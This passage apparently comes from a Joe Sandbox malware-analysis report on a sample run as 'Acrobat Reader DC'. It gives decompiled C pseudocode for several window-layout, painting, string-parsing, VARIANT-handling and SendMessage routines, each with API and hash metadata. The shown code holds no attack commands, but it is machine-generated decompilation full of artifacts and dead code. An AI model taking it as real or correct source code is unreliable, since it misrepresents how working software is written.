                                  				struct HWND__* _t252;
                                  				struct HWND__* _t256;
                                  				struct HWND__** _t265;
                                  				struct HWND__* _t266;
                                  				struct HWND__** _t275;
                                  
                                  				_t275 = _a8;
                                  				_t265 = _a4;
                                  				if(_t265[0xe] == 0) {
                                  					_a8 = _t275[0x1f] & 0x0000ffff;
                                  					GetClientRect( *_t265,  &_v56);
                                  					_t161 = _v56.right;
                                  					_t243 = _v56.bottom;
                                  					_t223 = _t265[0x11];
                                  					_t218 = _t265[0x12];
                                  					_a12 = _t161;
                                  					_v24 = _t243;
                                  					_a4 = _t223;
                                  					_v12 = _t218;
                                  					if(_t161 == 0) {
                                  						_a12 = 1;
                                  						if(_t223 != 0) {
                                  							_a12 = _t223;
                                  						}
                                  					}
                                  					if(_t243 == 0) {
                                  						_v24 = 1;
                                  						if(_t218 != 0) {
                                  							_v24 = _t218;
                                  						}
                                  					}
                                  					if(_t265[0x68] != 0) {
                                  						_t218 = _t218 - GetSystemMetrics(0xf);
                                  						_v12 = _t218;
                                  					}
                                  					GetWindowRect( *_t275,  &_v56);
                                  					_t225 = _v56.left;
                                  					_t244 = _v56.top;
                                  					_v16 = _v56.right - _t225;
                                  					_v40.bottom = _t244;
                                  					_v20 = _v56.bottom - _t244;
                                  					_v40.right.x = _t225;
                                  					ScreenToClient( *_t265,  &(_v40.right));
                                  					_t226 = _v40.right.x;
                                  					asm("cdq");
                                  					_t266 = _v40.bottom;
                                  					_t275[0x20] = _t226 * _a4 / _a12;
                                  					asm("cdq");
                                  					_t219 = _v24;
                                  					_t275[0x20] = _t266 * _t218 / _v24;
                                  					asm("cdq");
                                  					_t275[0x21] = _v16 * _a4 / _a12;
                                  					asm("cdq");
                                  					_t275[0x21] = _v20 * _v12 / _t219;
                                  					_t182 = _a8;
                                  					if(_t182 == 0) {
                                  						goto L48;
                                  					} else {
                                  						if((_t182 & 0x00000100) != 0) {
                                  							_t256 = _v16;
                                  							_t275[0x21] = _t256;
                                  							if((_t182 & 0x00000006) == 0) {
                                  								if((_t182 & 0x00000008) == 0) {
                                  									asm("cdq");
                                  									if(_t226 > _a12 - _t256 >> 1) {
                                  										_t220 = _a12;
                                  										asm("cdq");
                                  										_t219 = _v24;
                                  										_t275[0x20] = (_t226 - _a12 + _v16) * _a4 / _t220 - _v16 + _a4;
                                  									}
                                  								} else {
                                  									asm("cdq");
                                  									_t275[0x20] = _t226 - (_a4 - _a12 - _t256 >> 1);
                                  								}
                                  								_t182 = _a8;
                                  							}
                                  						}
                                  						if((_t182 & 0x00000200) != 0) {
                                  							_t252 = _v20;
                                  							_t275[0x21] = _t252;
                                  							if((_t182 & 0x00000060) == 0) {
                                  								if(_t182 >= 0) {
                                  									asm("cdq");
                                  									if(_t266 > _t219 - _t252 >> 1) {
                                  										asm("cdq");
                                  										_t275[0x20] = (_t266 - _t219 + _v20) * _v12 / _t219 - _v20 + _v12;
                                  									}
                                  								} else {
                                  									asm("cdq");
                                  									_t275[0x20] = _t266 - (_v12 - _t219 - _t252 >> 1);
                                  								}
                                  								_t182 = _a8;
                                  							}
                                  						}
                                  						_t251 = _t182 & 0x00000002;
                                  						if(_t251 != 0) {
                                  							_t275[0x20] = _t226;
                                  						}
                                  						if((_t182 & 0x00000004) != 0) {
                                  							if(_t251 == 0) {
                                  								_t275[0x20] = _t226 - _a12 - _t275[0x21] + _a4 + _v16;
                                  							} else {
                                  								_t275[0x21] = _t226 - _t275[0x20] - _a12 + _a4 + _v16;
                                  							}
                                  						}
                                  						_t228 = _t182 & 0x00000020;
                                  						if(_t228 != 0) {
                                  							_t275[0x20] = _t266;
                                  						}
                                  						if((_t182 & 0x00000040) == 0) {
                                  							goto L48;
                                  						} else {
                                  							if(_t228 == 0) {
                                  								_t275[0x20] = _t266 - _t275[0x21] - _t219 + _v12 + _v20;
                                  								return _t182;
                                  							}
                                  							_t275[0x21] = _t266 - _t275[0x20] - _t219 + _v12 + _v20;
                                  							return _t182;
                                  						}
                                  					}
                                  				} else {
                                  					_t275[0x20] = _t265[0x16];
                                  					_t275[0x20] = _t265[0x17];
                                  					if(_t275[0x22] != 7 || _a12 != 0) {
                                  						_t275[0x21] = _t265[0x18];
                                  						_t275[0x21] = _t265[0x19];
                                  					}
                                  					GetClientRect( *_t275,  &_v40);
                                  					_t221 = _t217 | 0xffffffff;
                                  					if(_t265[0x16] == _t221) {
                                  						_t275[0x20] = _v40.left;
                                  					}
                                  					if(_t265[0x17] == _t221) {
                                  						_t275[0x20] = _v40.top;
                                  					}
                                  					_t182 = GetWindowRect( *_t275,  &_v40);
                                  					if(_t265[0x18] == _t221) {
                                  						_t275[0x21] = _v40.right.x - _v40.left;
                                  					}
                                  					if(_t265[0x19] == _t221 || _t275[0x22] == 0) {
                                  						_t275[0x21] = _v40.bottom - _v40.top;
                                  						return _t182;
                                  					} else {
                                  						L48:
                                  						return _t182;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                  • String ID:
                                  • API String ID: 3220332590-0
                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00444BFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a15) {
                                  				char _v12;
                                  				void* __edi;
                                  				signed int _t47;
                                  				signed int _t49;
                                  				signed int _t50;
                                  				signed int _t62;
                                  				signed int _t64;
                                  				signed int _t69;
                                  				signed int _t76;
                                  				signed int _t77;
                                  				signed int _t79;
                                  				signed int _t80;
                                  				signed int _t81;
                                  				signed int _t82;
                                  				signed int _t83;
                                  				intOrPtr _t85;
                                  				signed int _t88;
                                  				intOrPtr _t90;
                                  				intOrPtr _t93;
                                  				intOrPtr _t94;
                                  				void* _t96;
                                  				void* _t97;
                                  				void* _t98;
                                  				void* _t99;
                                  
                                  				_t94 = _a8;
                                  				_t93 = _a12;
                                  				_t47 = 0;
                                  				while(1) {
                                  					_t80 =  *(_t94 + _t47 * 2) & 0x0000ffff;
                                  					if(_t80 != 0x20 && _t80 != 9) {
                                  						break;
                                  					}
                                  					_t47 = _t47 + 1;
                                  				}
                                  				_t81 =  *(_t94 + _t47 * 2) & 0x0000ffff;
                                  				__eflags = _t81 - 0x22;
                                  				if(_t81 != 0x22) {
                                  					__eflags = _t81 - 0x27;
                                  					if(_t81 != 0x27) {
                                  						__eflags = _t81 - 0x3c;
                                  						if(_t81 != 0x3c) {
                                  							goto L29;
                                  						} else {
                                  							_t9 = _t81 + 2; // 0x2
                                  							_t88 = _t9;
                                  							_a15 = 0;
                                  							goto L10;
                                  						}
                                  					} else {
                                  						_t88 = _t81;
                                  						_a15 = 1;
                                  						goto L10;
                                  					}
                                  				} else {
                                  					_t88 = _t81;
                                  					_a15 = 1;
                                  					L10:
                                  					_t82 =  *(_t94 + 2 + _t47 * 2) & 0x0000ffff;
                                  					_t49 = _t47 + 1;
                                  					_t76 = 0;
                                  					__eflags = _t82 - _t88;
                                  					if(_t82 != _t88) {
                                  						while(1) {
                                  							__eflags = _t82;
                                  							if(_t82 == 0) {
                                  								goto L13;
                                  							}
                                  							_t49 = _t49 + 1;
                                  							 *(_t93 + _t76 * 2) = _t82;
                                  							_t82 =  *(_t94 + _t49 * 2) & 0x0000ffff;
                                  							_t76 = _t76 + 1;
                                  							__eflags = _t82 - _t88;
                                  							if(_t82 != _t88) {
                                  								continue;
                                  							}
                                  							goto L13;
                                  						}
                                  					}
                                  					L13:
                                  					__eflags =  *(_t94 + _t49 * 2) - _t88;
                                  					if( *(_t94 + _t49 * 2) != _t88) {
                                  						L29:
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						goto L14;
                                  						do {
                                  							do {
                                  								L14:
                                  								_t83 =  *(_t94 + 2 + _t49 * 2) & 0x0000ffff;
                                  								_t49 = _t49 + 1;
                                  								__eflags = _t83 - 0x20;
                                  							} while (_t83 == 0x20);
                                  							__eflags = _t83 - 9;
                                  						} while (_t83 == 9);
                                  						_t50 =  *(_t94 + _t49 * 2) & 0x0000ffff;
                                  						__eflags = _t50;
                                  						if(__eflags == 0) {
                                  							L18:
                                  							 *(_t93 + _t76 * 2) = 0;
                                  							E0043652F(__eflags,  &_v12, E00410160(_t93, __eflags));
                                  							_t95 = _v12;
                                  							E00444B5F( &_v12, _v12);
                                  							E00444BBB( &_v12, __eflags, _v12);
                                  							__eflags = _a15;
                                  							if(_a15 == 0) {
                                  								_t85 = _a4;
                                  								_t77 = 0;
                                  								__eflags =  *(_t85 + 0x3c);
                                  								if( *(_t85 + 0x3c) > 0) {
                                  									while(1) {
                                  										E00411567(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x38)) + _t77 * 4)));
                                  										E00411536(_t93, _t95);
                                  										_t62 = E004339FA(_t93);
                                  										_t97 = _t96 + 0x14;
                                  										__eflags = _t62;
                                  										if(_t62 != 0) {
                                  											goto L28;
                                  										}
                                  										E00411567(_t93, _t95);
                                  										_t90 = _a4;
                                  										_t77 = _t77 + 1;
                                  										_t96 = _t97 + 8;
                                  										__eflags = _t77 -  *((intOrPtr*)(_t90 + 0x3c));
                                  										if(_t77 <  *((intOrPtr*)(_t90 + 0x3c))) {
                                  											continue;
                                  										}
                                  										goto L28;
                                  									}
                                  								}
                                  								goto L28;
                                  							} else {
                                  								_t64 = E004339FA(_t93);
                                  								_t98 = _t96 + 4;
                                  								__eflags = _t64;
                                  								if(_t64 == 0) {
                                  									_t79 =  *((intOrPtr*)(_a4 + 0x3c)) - 1;
                                  									__eflags = _t79;
                                  									if(_t79 < 0) {
                                  										L28:
                                  										E00436508( &_v12);
                                  										return 1;
                                  									} else {
                                  										while(1) {
                                  											E00411567(_t93,  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x38)) + _t79 * 4)));
                                  											E00411536(_t93, _t95);
                                  											_t69 = E004339FA(_t93);
                                  											_t99 = _t98 + 0x14;
                                  											__eflags = _t69;
                                  											if(_t69 != 0) {
                                  												goto L28;
                                  											}
                                  											E00411567(_t93, _t95);
                                  											_t98 = _t99 + 8;
                                  											_t79 = _t79 - 1;
                                  											__eflags = _t79;
                                  											if(_t79 >= 0) {
                                  												continue;
                                  											} else {
                                  												E00436508( &_v12);
                                  												return 1;
                                  											}
                                  											goto L30;
                                  										}
                                  										goto L28;
                                  									}
                                  								} else {
                                  									E00436508( &_v12);
                                  									return 1;
                                  								}
                                  							}
                                  						} else {
                                  							__eflags = _t50 - 0x3b;
                                  							if(__eflags != 0) {
                                  								goto L29;
                                  							} else {
                                  								goto L18;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L30:
                                  			}
                                  0x00444d66
                                  0x00444d6b
                                  0x00444d6e
                                  0x00444d6f
                                  0x00444d72
                                  0x00444d75
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444d75
                                  0x00444d40
                                  0x00000000
                                  0x00444cc3
                                  0x00444cc4
                                  0x00444cc9
                                  0x00444ccc
                                  0x00444cce
                                  0x00444cea
                                  0x00444cea
                                  0x00444ceb
                                  0x00444d77
                                  0x00444d7b
                                  0x00444d88
                                  0x00444cf1
                                  0x00444cf1
                                  0x00444cfc
                                  0x00444d03
                                  0x00444d09
                                  0x00444d0e
                                  0x00444d11
                                  0x00444d13
                                  0x00000000
                                  0x00000000
                                  0x00444d17
                                  0x00444d1c
                                  0x00444d1f
                                  0x00444d1f
                                  0x00444d20
                                  0x00000000
                                  0x00444d22
                                  0x00444d26
                                  0x00444d33
                                  0x00444d33
                                  0x00000000
                                  0x00444d20
                                  0x00000000
                                  0x00444cf1
                                  0x00444cd0
                                  0x00444cd4
                                  0x00444ce1
                                  0x00444ce1
                                  0x00444cce
                                  0x00444c90
                                  0x00444c90
                                  0x00444c93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444c93
                                  0x00444c8e
                                  0x00444c71
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscpy$_wcscat
                                  • String ID:
                                  • API String ID: 2037614760-0
                                  • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                  • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E00451B42(intOrPtr* _a4, signed short* _a8, signed short* _a12, char _a16, char _a20) {
                                  				signed short _v16;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t61;
                                  				long _t65;
                                  				intOrPtr _t70;
                                  				intOrPtr _t72;
                                  				intOrPtr _t86;
                                  				signed short* _t87;
                                  				intOrPtr* _t93;
                                  				intOrPtr _t99;
                                  				intOrPtr _t101;
                                  				signed int _t104;
                                  				intOrPtr _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr* _t115;
                                  				signed short* _t116;
                                  				signed int _t120;
                                  
                                  				_t87 = _a8;
                                  				_t116 = _a12;
                                  				_v40 = 0;
                                  				_v32 = 1;
                                  				_v28 = 0;
                                  				_a12 = _t87;
                                  				if( *0x4a7f19 == 0) {
                                  					L14:
                                  					E00403C90( *((intOrPtr*)( *_a4 + 4)) + _a4, _t87, 0);
                                  					__eflags = _a20;
                                  					if(_a20 == 0) {
                                  						goto L13;
                                  					} else {
                                  						E00408F40(_t115,  &_v40);
                                  						return 1;
                                  					}
                                  				} else {
                                  					_t61 =  *0x4a7f1c; // 0x0
                                  					if(_t61 == 0) {
                                  						goto L14;
                                  					} else {
                                  						if( *((char*)(_t61 + 0x40)) == 0) {
                                  							 *((short*)(_t61 + 0x48)) = 3;
                                  							 *((intOrPtr*)(_t61 + 0x50)) = _t87;
                                  							 *((short*)(_t61 + 0xa8)) = 3;
                                  							_t65 = GetLastError();
                                  							_t107 =  *0x4a7f1c; // 0x0
                                  							 *(_t107 + 0xb0) = _t65;
                                  							 *((short*)(_t107 + 0xb8)) = 3;
                                  							 *((intOrPtr*)(_t107 + 0xc0)) = E004348AA( *((intOrPtr*)(_a4 + 0xf4)));
                                  							if(_t116 != 0) {
                                  								_t115 = __imp__#10;
                                  								_v24 = 8;
                                  								_v16 = _t116[2];
                                  								 *_t115(_t107 + 0x78,  &_v24);
                                  								_t99 =  *0x4a7f1c; // 0x0
                                  								_v16 = _t116[4];
                                  								 *_t115(_t99 + 0x68,  &_v24);
                                  								_t101 =  *0x4a7f1c; // 0x0
                                  								_v16 = _t116[6];
                                  								 *_t115(_t101 + 0x88,  &_v24);
                                  								_t86 =  *0x4a7f1c; // 0x0
                                  								 *((short*)(_t86 + 0x98)) = 3;
                                  								 *(_t86 + 0xa0) = _t116[8];
                                  								 *((short*)(_t86 + 0xc8)) = 3;
                                  								_t104 =  *_t116 & 0x0000ffff;
                                  								if(_t104 == 0) {
                                  									_t120 = _t116[0xe];
                                  								} else {
                                  									_t120 = _t104;
                                  								}
                                  								 *(_t86 + 0xd0) = _t120;
                                  								_t126 = _t120;
                                  								if(_t120 != 0) {
                                  									_a12 = _t120;
                                  								}
                                  							}
                                  							E0040BC70( &_v56, _t126);
                                  							if(_a16 == 0) {
                                  								E0040E0A0( &_v56, E0044AF6C( &_v72, _a12));
                                  								E00402250( &_v72);
                                  								_a16 = _v56;
                                  							}
                                  							_t70 =  *0x4a7f1c; // 0x0
                                  							__imp__#9(_t70 + 0x58);
                                  							_t72 = _a16;
                                  							_t108 =  *0x4a7f1c; // 0x0
                                  							 *((short*)(_t108 + 0x58)) = 8;
                                  							__imp__#2(_t72);
                                  							_t93 =  *0x4a7f1c; // 0x0
                                  							 *((intOrPtr*)(_t93 + 0x60)) = _t72;
                                  							 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 0x20))))();
                                  							E00402250( &_v56);
                                  						}
                                  						E00403C90( *((intOrPtr*)( *_a4 + 4)) + _a4, _t87, 0);
                                  						L13:
                                  						E00408F40(_t115,  &_v40);
                                  						return 0;
                                  					}
                                  				}
                                  			}




























                                  APIs
                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                  • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                  • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                  • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                  • String ID:
                                  • API String ID: 960795272-0
                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E00447BA8(void* __fp0, intOrPtr _a4) {
                                  				struct tagPAINTSTRUCT _v68;
                                  				struct tagRECT _v84;
                                  				struct tagPOINT _v92;
                                  				struct HWND__** _v104;
                                  				void* _v129;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t32;
                                  				signed int _t37;
                                  				signed int _t38;
                                  				struct HWND__** _t45;
                                  				struct HWND__* _t46;
                                  				void* _t51;
                                  				struct HWND__** _t55;
                                  				struct HWND__* _t57;
                                  				intOrPtr _t59;
                                  				struct HDC__* _t73;
                                  				struct HWND__* _t76;
                                  				signed int _t78;
                                  				void* _t80;
                                  				void* _t91;
                                  
                                  				_t91 = __fp0;
                                  				_t80 = (_t78 & 0xfffffff8) - 0x5c;
                                  				_t32 = E00430C09(_a4, 0x4a8630, _a4);
                                  				_t59 =  *0x4a8690; // 0x0
                                  				_t55 =  *( *(_t59 + _t32 * 4));
                                  				_t76 = _t55[0x73];
                                  				_v104 = _t55;
                                  				_t73 = BeginPaint( *_t55,  &(_v84.right));
                                  				while(_t76 != 0) {
                                  					_t37 =  *(_t76 + 8);
                                  					if(( *(_t37 + 0x8a) & 0x00000010) == 0 ||  *(_t37 + 0x8b) != 0xff) {
                                  						if(( *(_t37 + 0x8b) & 0x000000ff) == _t55[0x65]) {
                                  							goto L5;
                                  						}
                                  					} else {
                                  						L5:
                                  						_t38 = _t37 | 0xffffffff;
                                  						 *0x4a86f4 = _t38;
                                  						 *0x4a86f8 = _t38;
                                  						 *0x4a86ec = 0;
                                  						 *0x4a86e8 = 0;
                                  						 *0x4a86e4 = 0;
                                  						 *0x4a86f0 = 1;
                                  						GetWindowRect( *( *(_t76 + 8)),  &_v84);
                                  						_v92.x = _v84.left;
                                  						_v92.y = _v84.top;
                                  						ScreenToClient( *_t55,  &_v92);
                                  						SetViewportOrgEx(_t73, _v92, _v92.y, 0);
                                  						_t45 =  *(_t76 + 8);
                                  						_t57 = _t45[0x11];
                                  						_t46 = _t45[0x12];
                                  						if(_t57 < 0) {
                                  							L8:
                                  							if(_t46 != 0xffffffff || _t57 >= 0) {
                                  								goto L10;
                                  							}
                                  						} else {
                                  							if(_t46 != 0xffffffff) {
                                  								L10:
                                  								E0044719B(_t73, _t46, _t57, 0, 1);
                                  								Rectangle(_t73, 0, 0, ( *(_t76 + 8))[0x21], ( *(_t76 + 8))[0x21]);
                                  								E0042FD29(_t73, _t57);
                                  							} else {
                                  								_t46 = _t57;
                                  								goto L8;
                                  							}
                                  						}
                                  						_t51 = E0044734F(_t91, _t73, _t76);
                                  						E0044770D(_t73, _t73, _t76);
                                  						if(_t51 != 0) {
                                  							E004475CC(_t73, _t76, _t73, _t76);
                                  						}
                                  						_t55 =  *(_t80 + 0xc);
                                  					}
                                  					_t76 = _t76->i;
                                  				}
                                  				return EndPaint( *_t55,  &_v68);
                                  			}

























                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                  • GetWindowRect.USER32 ref: 00447C5D
                                  • ScreenToClient.USER32 ref: 00447C7B
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                  • EndPaint.USER32(?,?), ref: 00447D13
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                  • String ID:
                                  • API String ID: 4189319755-0
                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044900D(void* __ecx, void* __eflags, signed int _a4, long _a8) {
                                  				signed int _v8;
                                  				signed int _t32;
                                  				signed char _t39;
                                  				intOrPtr _t44;
                                  				intOrPtr _t49;
                                  				struct HWND__* _t53;
                                  				struct HWND__** _t58;
                                  
                                  				if(E00441AF5(0x4a8630, _a4,  &_a4,  &_v8) == 0) {
                                  					L16:
                                  					return 0;
                                  				} else {
                                  					_t44 =  *0x4a8690; // 0x0
                                  					_t49 =  *0x4a86a4; // 0xa51ad0
                                  					_a4 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _a4 * 4))));
                                  					_t58 =  *( *(_t49 + _v8 * 4));
                                  					_t53 =  *_t58;
                                  					_t39 = _t58[0x22];
                                  					E00432B92( &_a8);
                                  					_t32 = _t39 & 0x000000ff;
                                  					if(_t32 > 0x1b) {
                                  						goto L16;
                                  					} else {
                                  						_t13 = _t32 + 0x449159; // 0x0
                                  						switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M0044913D))) {
                                  							case 0:
                                  								L8:
                                  								__eax = _a4;
                                  								 *((intOrPtr*)(__esi + 0x48)) = _a8;
                                  								__eax = E00430B87(_a4, __esi, 1);
                                  								goto L9;
                                  							case 1:
                                  								__ecx = _a8;
                                  								__eax = SendMessageW(__edi, 0x409, 0, _a8);
                                  								goto L9;
                                  							case 2:
                                  								__eax = SendMessageW(__edi, 0x111e, 0, _a8);
                                  								goto L9;
                                  							case 3:
                                  								__ecx =  *(__esi + 0x30);
                                  								__eax = _a8;
                                  								 *((intOrPtr*)(__esi + 0x48)) = _a8;
                                  								__eax = InvalidateRect( *(__esi + 0x30), 0, 1);
                                  								goto L9;
                                  							case 4:
                                  								_t34 = SendMessageW(_t53, 0x1024, 0, _a8);
                                  								L9:
                                  								if( *0x49751c == 0 || _t39 != 8 && _t39 != 4 && _t39 != 0x1a && _t39 != 0x19) {
                                  									return 1;
                                  								} else {
                                  									return _t34 | 0xffffffff;
                                  								}
                                  								goto L17;
                                  							case 5:
                                  								__eax = GetWindowLongW(__edi, 0xfffffff0);
                                  								__eax = SetWindowLongW(__edi, 0xfffffff0, __eax);
                                  								goto L8;
                                  							case 6:
                                  								goto L16;
                                  						}
                                  					}
                                  				}
                                  				L17:
                                  			}











                                  APIs
                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                  • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                  • SetWindowLongW.USER32 ref: 004490E1
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow$InvalidateRect
                                  • String ID:
                                  • API String ID: 1976402638-0
                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
